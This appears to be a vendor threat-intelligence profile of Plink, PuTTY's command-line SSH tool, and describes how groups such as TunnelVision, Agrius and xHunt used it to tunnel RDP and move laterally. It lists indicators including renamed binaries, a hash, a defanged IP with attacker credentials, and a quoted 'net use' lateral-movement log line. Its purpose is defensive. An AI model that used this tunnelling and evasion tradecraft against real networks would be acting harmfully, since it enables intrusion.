Plink
Plink is the command-line connection tool from PuTTY that threat actors repeatedly use as a dual-use tunneling utility rather than as bespoke malware. Across the provided reporting, it is used to establish encrypted SSH tunnels, including reverse tunnels, to reach internal services, transfer tools, and enable remote access and lateral movement. Multiple reports specifically describe Plink being used to tunnel RDP connections to compromised hosts, and in some cases HTTP access to internal IIS servers. Actors have also renamed Plink binaries to evade detection, including systems.exe and RTQ.exe, and one report describes a modified PuTTY/Plink executable, napupdatedb.exe, that initiates an SSH reverse tunnel with embedded credentials from local port 3389 to an attacker-controlled server over TCP port 8531. That modified sample reportedly contains an embedded semicolon-separated configuration of C2 servers and credentials and replaces "*" in C2 domains with the six-digit local time.
Threat activity in the content associates Plink with several clusters and campaigns. SentinelLabs reported Iranian-aligned TunnelVision using Plink, alongside FRPC and Ngrok, after exploiting vulnerabilities such as CVE-2018-13379, ProxyShell, and Log4Shell in VMware Horizon environments; the group used it to tunnel RDP traffic after deploying backdoors, harvesting credentials, and moving laterally. Agrius used Plink to tunnel RDP connections for remote access and lateral movement, sometimes renaming it systems.exe. In the xHunt campaign at Kuwaiti organizations, actors used the BumbleBee ASPX webshell to execute commands and then used PuTTY Link (Plink), sometimes renamed RTQ.exe, to create SSH tunnels for TCP 3389 and TCP 80, enabling access to internal systems and IIS servers; one observed tunnel used external IP 192.119.110[.]194 with credentials bor / 123321. TEMP.Veles used encrypted SSH-based PLINK tunnels during the C0032 campaign to transfer tools and enable RDP connections throughout the environment. Microsoft also reported Seashell Blizzard's LocalOlive web shell facilitating delivery of next-stage payloads including plink, and advisory reporting on DPRK-linked Andariel lists PLINK among open-source or dual-use tools used for execution, tunneling, and exfiltration.
The content also links Plink use to additional operations: Homeland Justice likely used publicly available Plink during attacks on Albanian organizations involving the No-Justice wiper; Stonefly used PuTTY and Plink for SSH connectivity during financially motivated intrusions against U.S. organizations; and broader ATT&CK-style reporting repeatedly cites Plink as a common utility for tunneling RDP into victim environments. High-confidence indicators directly tied to Plink usage in the content include renamed binaries systems.exe, RTQ.exe, and napupdatedb.exe; the modified napupdatedb.exe sample MD5 BA51F25DB03A66C658D1FD4396F32843; local port 3389 and TCP port 8531 in the reverse-tunnel configuration; and xHunt infrastructure including 192.119.110[.]194 used in an SSH tunnel command.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
3 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
"The most commonly deployed tunneling tools used by the group are Fast Reverse Proxy Client (FRPC) and Plink."
"The most commonly deployed tunneling tools used by the group are Fast Reverse Proxy Client (FRPC) and Plink."
"The most commonly deployed tunneling tools used by the group are Fast Reverse Proxy Client (FRPC) and Plink."
Groups observed using it
5 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
The most commonly deployed tunneling tools used by the group are Fast Reverse Proxy Client (FRPC) and Plink.
Agrius used the Plink tool to tunnel RDP connections for remote access and lateral movement in victim environments.
...deploying tunneling utilities such as Chisel, plink, and rsockstun to established dedicated conduits into affected network segments.
The commands executed on the servers via BumbleBee suggest that the actor used the PuTTY Link (Plink) tool to create SSH tunnels to access services internal to the compromised network.
Techniques & procedures
19 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique
Resource Development
Initial Access
2 techniques
Initial Access
The threat actors exploited the ProxyShell and Log4j vulnerabilities to deploy TunnelFish, a custom Fast Reverse Proxy client (FRPC) variant and enable remote access to vulnerable systems.
TunnelVision activities are characterized by wide-exploitation of 1-day vulnerabilities in target regions. During the time we’ve been tracking this actor, we have observed wide exploitation of Fortinet FortiOS (CVE-2018-13379), Microsoft Exchange (ProxyShell) and recently Log4Shell.
Execution
2 techniques
Execution
Persistence
1 technique
Persistence
Stealth
2 techniques
Stealth
Lateral Movement
5 techniques
Lateral Movement
"The threat actor used RDP with valid account credentials for lateral movement..."
Download and execution of tunneling tools, including Plink and Ngrok, used to tunnel RDP traffic.
15:49:30 net use \\<redacted IP #3>\C$ /user:<redacted domain>\<redacted username #2> <redacted password #1> T1021.002
Command and Control
7 techniques
Command and Control
“Sliver… penetration testing framework. Chisel… creates a TCP/UDP tunnel… over HTTP… secured via SSH… FastReverseProxy (FRP)… to expose local servers to the public internet.”
Due to the threat actor’s heavy reliance on tunneling tools... The most commonly deployed tunneling tools used by the group are Fast Reverse Proxy Client (FRPC) and Plink.
Several entries mention use of proxy and tunneling tools including PLINK, Venom proxy, GOST reverse proxy, Ligolo, Cloudflared, rsocx reverse proxy, Iox proxy tool, NPS tunneling tool, and AirVPN.
FIN8 has used the Plink utility to tunnel RDP back to C2 infrastructure. REPTILE can use TLS over raw TCP for secure C2.
In this example, the threat actor attempted to download ngrok to a compromised VMware Horizon server.
Recent activity
13 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Command-line network connection tool often used for tunneling and remote access.
SSH/tunneling utility used to create access conduits into compromised network segments.
Command-line SSH client (PuTTY suite) used for scripted remote connections and tunneling.
Publicly available network communication utility used by the attackers as part of the intrusion toolset.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.